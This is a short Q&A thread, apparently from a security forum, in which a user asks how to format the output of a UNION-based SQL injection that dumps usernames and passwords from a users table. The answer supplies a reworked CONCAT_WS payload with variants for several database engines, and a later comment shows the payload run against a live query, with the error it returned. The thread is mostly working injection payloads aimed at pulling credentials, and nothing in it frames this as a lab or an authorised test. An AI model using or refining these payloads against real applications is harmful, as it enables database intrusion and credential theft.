# how to separate arguments in sql query

Tags: sql-injection, injection

I have this query :

```
'UNION ALL SELECT group_concat(username,password) from users--
```

and I want to separate username and password because when I execute the code it prints it all in one long string.
I tried to separate them with `:` encoded:

```
'UNION ALL SELECT group_concat(username,0x3a,password) from users--
```

Comment: It would be useful to know what the DBMS is, as that could impact the options available.

Comment: what do you mean by DBMS ?

Comment: @bob database management system (i.e. the DB software that you're using such as MySQL, PostgreSQL, etc.)

Comment: This question is a purely SQL programming question and not an InfoSec question at all.

Answer (score 0):

`group_concat` is the [wrong function](https://stackoverflow.com/questions/11889391/difference-between-group-concat-and-concat-ws). Try this:

```
'UNION ALL SELECT CONCAT_WS(0x3a,username,password) FROM users--
```

(note also the order of the arguments. If you want more columns, you can just append them: `CONCAT_WS(0x3a,username,password, moreColumns, canBeHere)`).

<sub>This works for MySQL and PostgreSQL. SQL Server doesn't have `CONCAT_WS`, but it does have `CONCAT` (without separator) or you can manually concat: `username + ':' + password`. Oracle also does not have `CONCAT_WS`, but this should work: `username || ':' || password`. This is also how it would be done with SQLite, which also does not have `CONCAT_WS`.</sub>

Comment: hey is there a way to contact you? If you have spare time :D And btw thank you for your answer!

Comment: it returns [SELECT content FROM tweets WHERE content like '%'UNION ALL SELECT CONCAT_WS(0x3a,username,password) FROM users--%']. PDO Error Info: array ( 0 => 'HY000', 1 => 1, 2 => 'unrecognized token: "0x3a"', )